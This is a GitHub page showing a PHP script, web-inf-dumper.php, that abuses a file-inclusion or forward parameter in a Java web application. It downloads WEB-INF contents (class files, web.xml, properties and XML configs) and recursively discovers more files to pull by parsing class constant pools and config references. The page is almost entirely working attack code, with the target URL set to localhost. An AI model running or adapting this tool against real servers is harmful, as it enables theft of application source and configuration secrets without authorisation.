-
Notifications
You must be signed in to change notification settings - Fork 18
/
Copy pathweb-inf-dumper.php
98 lines (84 loc) · 2.69 KB
/
web-inf-dumper.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<?php
$url = 'http://localhost:8080/WebApplication_ForwardTest/index.jsp?page=$file$';
$regexp = '/(.*)/mis';
$outdir = './out/';
$queue = file('web-inf.txt');
$checked = [];
while(count($queue) != 0) {
echo 'Queue count = '.count($queue).PHP_EOL;
$file = trim(array_pop($queue));
checkFile($file);
}
function checkFile($file) {
global $url, $regexp, $checked, $outdir;
if(!in_array($file, $checked)) {
$checked[] = $file;
} else {
return FALSE;
}
$out = @file_get_contents(str_replace('$file$', $file, $url));
preg_match($regexp, $out, $m);
if(isset($m[1]) and !empty($m[1])) {
$result = $m[1];
if(!file_exists($outdir.dirname($file)))
mkdir($outdir.dirname($file), 0777, true);
file_put_contents($outdir.$file, $result);
parseFile($result, dirname($file).'/');
echo '+ '.$file.PHP_EOL;
} else {
echo '- '.$file.PHP_EOL;
return FALSE;
}
}
function parseFile($content, $dirname) {
global $queue, $blacklist;
# class constant pool
preg_match_all('/L((?:[a-zA-Z_$][a-zA-Z\d_$]*\/)*[a-zA-Z_$][a-zA-Z\d_$]*);/', $content, $m);
if(isset($m[1]) and !empty($m[1])) {
$m[1] = array_unique($m[1]);
foreach ($m[1] as $class) {
$queue[] = 'WEB-INF/classes/'.$class.'.class';
}
}
# web.xml
preg_match_all('/class>((?:[a-zA-Z_$][a-zA-Z\d_$]*\.)*[a-zA-Z_$][a-zA-Z\d_$]*)<\//', $content, $m);
if(isset($m[1]) and !empty($m[1])) {
$m[1] = array_unique($m[1]);
foreach ($m[1] as $class) {
$class = str_replace('.', '/', $class);
$queue[] = 'WEB-INF/classes/'.$class.'.class';
}
}
# class files
preg_match_all('/((?:[a-z_$][a-z\d_$]*(?:\.|\/))+[A-Z][a-zA-Z\d_$]*)/', $content, $m);
if(isset($m[1]) and !empty($m[1])) {
$m[1] = array_unique($m[1]);
foreach ($m[1] as $class) {
$class = str_replace('.', '/', $class);
$queue[] = 'WEB-INF/classes/'.$class.'.class';
}
}
# xml, properties files
preg_match_all('/((?:[a-zA-Z\d\-_$]+\/)*[a-zA-Z\d\-_$]*\.(?:xml|properties))/', $content, $m);
if(isset($m[1]) and !empty($m[1])) {
$m[1] = array_unique($m[1]);
foreach ($m[1] as $file) {
if(!startsWith($file, 'WEB-INF') and !startsWith($file, 'META-INF')) {
$queue[] = 'WEB-INF/'.$file;
$queue[] = 'WEB-INF/classes/'.$file;
$queue[] = 'WEB-INF/config/'.$file;
$queue[] = 'WEB-INF/conf/'.$file;
$queue[] = 'WEB-INF/resources/'.$file;
$queue[] = 'META-INF/'.$file;
$queue[] = $dirname.$file;
} else {
$queue[] = $file;
}
}
}
}
function startsWith($haystack, $needle){
$length = strlen($needle);
return (substr($haystack, 0, $length) === $needle);
}
?>